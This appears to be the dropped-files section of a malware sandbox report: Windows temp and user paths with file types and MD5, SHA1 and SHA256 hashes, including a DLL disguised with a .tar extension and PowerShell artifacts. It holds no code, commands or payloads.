C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxeyg3mo.y0j.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qsj5yier.2ga.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\baby.srt	ASCII text, with no line terminators	B65E75C090BAB4D266CDDB68A72B86AA	D069F5D2B225C97DEAF7728084094CC7B02A7BD9	ADF7C7A26F024895504AB358A846DAD6D52FD9E04C5A517EE176AD3B122B6A21
C:\Users\user\AppData\Local\Temp\embezzle.zip	Zip archive data, at least v2.0 to extract	03DCEA10BDACEE90CBBA66EC99F4C0E9	49F7A2F52552A21DC8262E56000A949BDE9F9BBE	3EBEE8C3546A86708013A454701AD0B642EB1A4396722E50B84EA5E4373E86AA
C:\Users\user\AppData\Local\Temp\illegal.dds	ASCII text, with no line terminators	38634869D064FBE23CE9F69FCC12F2FE	90C3A33305C346B5534CE2C7DB99D12A491F8F46	8B30DFD23B27090F6F373E01CE08B94ADADCDC850869392D36D88D1AC43C7A3B
C:\Users\user\AppData\Local\Temp\onerous.tar	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	79D81979DBBD1C8CEB04CC80A903ECD1	F40959018E132FB1430F77A26903AF222244676C	5DD2F21B81330A342FE1BB9A17A8FDE423928E266D4842887F8B41E5D7C2FBD6
C:\Users\user\AppData\Local\Temp\zyvn03im\CSCD3BE44FE21F9438DABBEBC9691CFFC2.TMP	MSVC .res	ED01CED379AE6284D1E41DB8AB1AEB0B	911846ADE0C4B943753090C0C548B32367D2C7F6	B68A4962CAC81E246DEF2B70897949F89438AFC3DF8827D284A3F064B9FFB80B
C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.0.cs	UTF-8 Unicode (with BOM) text	216105852331C904BA5D540DE538DD4E	EE80274EBF645987E942277F7E0DE23B51011752	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	1DE75D93AE879774E296B28DE9AAAE62	DB3868F34F2C517DC07A6109AA3A4DDB2454C395	7F7573D1F4B33115092896C839A85F9CE500CA1877558053E3D2333A76D1F9D5
C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	D11380C2C861B20584A4992EFA60897C	26D9A06DFAC5CA578B6FB2A116649B6ED06A4F5E	D5240A58347151EC13D595B2F482A268BA941FD8D141DC8A287BC57C96F18A45
C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF0AB2BD14A19245DE.TMP	data	814ECD38A1CF1A53B71F68331B1AE592	57B09EBF94AA702069FC625010CE04CEDB833CAB	B06691B7C897D4924F2468896F32C6063F1B4BAE19B19E400EFF061245B7EF31
C:\Users\user\AppData\Local\Temp\~DF1231949214C5550B.TMP	data	9F5522A87D5C276B35DDCF71FE00BDAA	C33858245F3695BFBB9DAF3DB25B3FCE29EEE01B	CB2BD9BBD5C056501E34C7126A96A4B22EC74FBDE869EAC3F863B54D29DB03E5
C:\Users\user\AppData\Local\Temp\~DF5393CE67AC057617.TMP	data	39A4E24E3A02AF11452FA78FFCC84692	48876267838F256D1DC058C8B274FE5CF96F2E88	3F326D98E117981099A0CBDC81777BC4548435ED6521D1499F01B608DD316F0B
C:\Users\user\AppData\Local\Temp\~DF86C812353526CE2F.TMP	data	44427C8D1008B4CD4C466DBC948FB305	BCF971D020EBD588B51854AAB70F577DEF5B6B73	9D42A2F3882796B9CE95D05F4D096B1DA818B4E1AA4054202615BEABF7DE401E
C:\Users\user\AppData\Local\Temp\~DFC39C2B8AA4095BB4.TMP	data	39D55E1E51E7A27A4FB8EF115B9A11AA	03B2E1965AFCB69E7B37F8F6286042767CE9558E	B73EA8A1FD49D7C4764300CED5994CC2ECF4299FA20F2469B038C3383FDA1106
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}	ASCII text, with CRLF line terminators	27462D35A8CB78712F39FF387F761694	B319CD07316C22FF65B419F1E8DEE4774654E9DB	5633EA20FADE3E15BFF717734F0D182EE9A4CA5E2FA3D841870EBD108BC02E7C
C:\Users\user\Documents\20201123\PowerShell_transcript.887849.0BvN9fZj.20201123161042.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	0F8005D56E44398EC925973FA064F941	B429AB8A7E428BFD76B18FA583D6B9C01375D337	F1EF1279937CDEB354EFDD7EEB98C4AA98680400A4BAC4FC0D2DE934EBF5E4F2